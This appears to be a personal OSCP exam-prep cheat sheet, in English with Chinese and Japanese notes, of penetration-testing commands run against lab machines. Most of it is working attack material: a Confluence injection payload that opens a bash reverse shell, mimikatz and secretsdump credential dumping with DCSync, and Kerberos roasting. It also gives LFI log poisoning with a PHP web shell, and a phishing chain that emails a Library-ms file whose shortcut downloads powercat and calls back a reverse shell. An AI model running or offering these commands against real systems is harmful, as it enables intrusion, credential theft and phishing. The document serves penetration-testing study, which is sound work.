curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/
config file
cat /var/atlassian/application-data/confluence/confluence.cfg.xml
The Hashcat mode number for Atlassian (PBKDF2-HMAC-SHA1) hashes is 12001,
hashcat -m 12001 hashes.txt /usr/share/wordlists/fasttrack.txt
Do not require Kerberos preauthentication is enabled
impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete
hashcat -m 18200 <hashfile> <Wordlists> -r <rule> --force
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
hashcat -m 13100 <hashfile> <Wordlists> -r <rule> --force
privilege::debug
sekurlsa::logonpasswords
lsadump::dcsync /user:<Domain\<TargetUsername>
hashcat -m 1000 <hashfile> <Wordlists> -r <rule> --force
zip2johnコマンドにてzipファイルから(Johnが解析できる形式の)ハッシュ値を生成して、hash.txtに保存します。
zip2john /path/to/your/protected.zip > ziphash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt ziphash.txt
//for multiple zip files
#!/bin/bash
# Loop through each zip file in the current directory
for file in *.zip; do
sudo zip2john "$file" > "${file%.zip}.hash"
done
john --wordlist=/usr/share/wordlists/rockyou.txt *.hash
psql -h 192.168.50.63 -p 2345 -U postgres
postgres=# \l
--》 list databases
postgres=# \c <DB name>
--> connect to the database
e.g. postgres=# \c confluence
confluence=# select * from cwd_user;
http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa
curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log
--> if access.log shows that the User Agent is included in the log entry, we canmodify the User Agent to include the PHP code snippet <?php echo system($_GET['cmd']); ?>
==> curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log*&cmd=ps
and more reverse shell code..
see https://github.com/WDavid404/OSCP/issues/10
curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls"
"&&whoami" 'or order by 5--//
linux-kenel-exploit: https://github.com/SecWiki/linux-kernel-exploits
PowerView.ps1: /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
mimikatz.exe: /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
Bloodhound: sudo apt update && sudo apt install -y bloodhound
Sharphound: https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors
WinPEAR.exe: Installation on Kali: sudo apt install peass
then, cp /usr/share/peass/winpeas/winPEASx64.exe .
linpeas.sh: wget -qc https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.s
WindowsEnum: https://github.com/absolomb/WindowsEnum
AutoRecon: https://github.com/Tib3rius/AutoRecon --> But AutoRecon sometimes miss some ports, so you need to use nmap to scan manually.
e.g
python3 autorecon.py 192.168.1.100 192.168.1.1/30 localhost
python3 autorecon.py -ct 2 -cs 2 -vv -o outputdir 192.168.1.100 192.168.1.1/30 localhost -vv
# When you want to use sudo
sudo env "PATH=$PATH" autorecon 192.168.1.100
powershell -ep bypass
mimikatz #privilege::debug
mimikatz #sekurlsa::logonpasswords
mimikatz #token::elevate ## to elevate to SYSTEM user privileges.
mimikatz #lsadump::sam
#### online command
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
.\mimikatz.exe "token::elevate" "lsadump::sam" "exit"
### dcsync
mimikatz # lsadump::dcsync /user:corp\Administrator
mimikatz # lsadump::dcsync /user:corp\<username>
https://www.netexec.wiki/
netexec
crackmapexec smb 172.16.206.10-14 172.16.206.82-83 -u joe -d MEDTECH.COM -p "Flowers1" --shares
proxychains -q crackmapexec smb 172.16.206.10-14 172.16.206.82-83 -u joe -d MEDTECH.COM -p "Flowers1" --shares
crackmapexec smb <I.P address/subnet> -u
impacket-psexec -hashes 000000000000000000000000000000000:8d7a47a6f9f66b97b1bae4178747494 joe@172.16.206.11 proxychains -q impacket-psexec -hashes 000000000000000000000000000000000:8d7a47a6f9f66b97b1bae4178747494 joe@172.16.206.11 impacket-psexec relia/administrator:"vau!XCKjNQBv2$"@192.168.246.189
proxychains impacket-GetNPUsers -dc-ip 172.16.193.10 -request -outputfile hashes.asreproast medtech.com/joe:password
locate GetNPUsers.py
impacket-secretsdump example.local/username:password@<target-ip>
# -just-dc: Extract only NTDS.DIT (NTLM hashes and kerberos keys).
impacket-secretsdump -just-dc example.local/username:password@<target-ip>
# -just-dc-ntlm: Extract only NTDS.DIT data (NTLM hashes only).
impacket-secretsdump -just-dc-ntlm example.local/username:password@<target-ip>
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
//ntds.bak and system.back is donwload from the target machine.
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
[Kali] 下载chisel到目前目录 (https://github.com/jpillora/chisel/releases/tag/v1.9.1,下载windows amd64那个 和 linux的) chmod a+x chisel ./chisel server -p 8000 --reverse
[Victim] iwr -uri http://192.168.45.152/chisel.exe -Outfile chisel.exe .\chisel client 192.168.45.152:8000 R:1080:socks
add ip and domain name to /etc/hosts: sudo vi /etc/hosts
kali@kali:~$ mkdir /home/kali/pen-200/webdav
kali@kali:~$ wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/pen-200/webdav/
血泪教训: webdav的端口必须用80,否则后面动作会不成功!
2. 登陆一台WindowsPC来制作Windows Lib文件(config.Library-ms)和shortcut文件
Connect WINPREP via RDP as offsec with a password of lab in order to prepare the Windows Library and shortcut files.
<?xml version="1.0" encoding="UTF-8"?>
注意:config.Library-ms文件保存到kali后里面内容会变,要注意手动恢复回来。
在WinPC的桌面上新建一个shortcut(名字为configuration等都可以)
shorcut内容指定为如下,然后把shorcut拷贝到Kali的webdav里(双击config文件,也就指向了webdav目录里)
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.204:9000/powercat.ps1'); powercat -c 192.168.45.204 -p 4444 -e powershell"
--》即将会从kali的9000 port(对应http.server的port)里下载一个powercat.ps文件并通过执行它向kali的4444 port发送reverse shell信息
在Kali上准备好
- webdav目录下放置powercat.ps1 文件(/usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1)
_血泪注意: 网上下载的powercat.ps1不好用,还是在kali里搜索吧: find / -name powercat.ps1 2>/dev/null_
- 在webdav目录里 python3 -m http.server 9000
- nc -lvp 4444
- body.txt文件,内容任意。
then,
kali@kali:~/beyond$ sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
Username: john Password: dqsTwTpZPn#nL === Trying 192.168.50.242:25... === Connected to 192.168.50.242. <- 220 MAILSRV1 ESMTP -> EHLO kali <- 250-MAILSRV1 <- 250-SIZE 20480000 <- 250-AUTH LOGIN <- 250 HELP -> AUTH LOGIN <- 334 VXNlcm5hbWU6 -> am9obg== <- 334 UGFzc3dvcmQ6 -> ZHFzVHdUcFpQbiNuTA== <- 235 authenticated. -> MAIL FROM:john@beyond.com <- 250 OK -> RCPT TO:marcus@beyond.com <- 250 OK -> DATA <- 354 OK, send. -> 36 lines sent <- 250 Queued (1.088 seconds) -> QUIT <- 221 goodbye === Connection closed with remote host.
nc上会收到一个internal pc(CLIENTWK1)来的reverse shell (IP:172.16.74.243)
chromium --enable-chrome-browser-cloud-management
--
./GodPotato-NET4.exe -cmd "C:\Users\adrian\nc64.exe -e c:\windows\system32\cmd.exe 192.168.45.243 4445"
https://dev.mysql.com/doc/refman/8.0/en/connecting.html
mysql --host=localhost --user=myname --password=password mydb
mysql -h localhost -u myname -ppassword mydb
mysql --host=localhost --user=myname --password mydb
mysql -h localhost -u myname -p mydb
https://github.com/DominicBreuker/pspy
target$ timeout 5m ./pspy64
This will run the pspy executable and then terminate it automatically after 5 minutes. Can do with seconds too, e.g. 180s.
unzip xxxx.zip unzip -P your-password zipfile.zip 7z x test.7z -ppassword tar -zxvf xxxx.tar.gz
tar -zcvf xxxx.tar.gz directory zip -r xxxx.zip directory
https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp
snmpwalk -v 2c -c public 192.168.190.149 NET-SNMP-EXTEND-MIB::nsExtendOutputFull
snmpbulkwalk -c public -v2c 192.168.182.149 .
--》 里面包含的信息比autorecon的多。。比如password
sc.exe start "service name"
sc.exe stop "service name"
PS> Start-Service -Name "ServiceName"
PS> Restart-Service -Name "ServiceName"
get-service "ServiceName" | stop-service -WhatIf
exiftool -a -u PDF_NAME.pdf
cd c:\Users then tree /F
ls -Force
dir -force
https://github.com/peass-ng/PEASS-ng/blob/master/winPEAS/winPEASexe/README.md The ouput will be colored using ansi colors. If you are executing winpeas.exe from a Windows console, you need to set a registry value to see the colors (and open a new CMD):
REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
Below you have some indications about what does each color means exacty, but keep in mind that Red is for something interesting (from a pentester perspective) and Green is something well configured (from a defender perspective).
openssl passwd xxxx
或者
openssl passwd -1 -salt xxxxxxxx password
---》
$1$xxxxxxxx$UYCIxa628.9qXjpQCjM4a.
### options:
Cryptographic options:
-salt val Use provided salt
-6 SHA512-based password algorithm
-5 SHA256-based password algorithm
-apr1 MD5-based password algorithm, Apache variant
-1 MD5-based password algorithm
-aixmd5 AIX MD5-based password algorithm
https://gabb4r.gitbook.io/oscp-notes/cheatsheet/command-injection-cheatsheet
https://www.kali.org/tools/cewl/
cewl -d 2 -m 5 -w docswords.txt https://example.com
cat secret.txt | base64 -d
install metasploit framework in kali
sudo apt-get update
sudo apt-get install metasploit-framework
OSCP-CheatSheet
https://notchxor.github.io/oscp-notes/2-web/LFI-RFI/ https://github.com/WDavid404/OSCP-CheatSheet https://github.com/saisathvik1/OSCP-Cheatsheet
Windows privilege escaliation guide
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ https://github.com/xMilkPowderx/OSCP/blob/master/Windows%20Priv%20Esc.md
linux privilege escalation list
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-shutdown-poweroff-privilege-escalation/
Notes:proving-grounds-all-33-warm-up-machines
https://medium.com/@abhirupkonwar04/proving-grounds-all-33-warm-up-machines-pwned-618cdb3d9607
Other
Hacktricks: https://book.hacktricks.xyz
https://gtfobins.github.io/ : a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
CVE exploit code list: https://github.com/Al1ex
https://github.com/danielmiessler/SecLists
MSFVenom Cheat Sheet: https://web.archive.org/web/20220607215637/https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/
PayloadsAllTheThings (e.g MS SQL injection ): https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md
On kali
tree /usr/share/webshells/
useful resource